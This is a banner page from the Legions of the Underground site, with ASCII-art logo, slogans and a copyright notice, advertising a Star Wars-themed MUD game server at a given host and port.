Sensenet.legions.org 5555 - The Best in Star Wars Reality Mudding -------------------------------------------------------------------------------- O F T E N I M I T A T E D N E V E R D U P L I C A T E D -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____| \_____/ \_____/ z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": www.legions.org z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* -------------------------------------------------------------------------------- All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2002 legions.org, all rights reserved. --------------------------------------------------------------------------------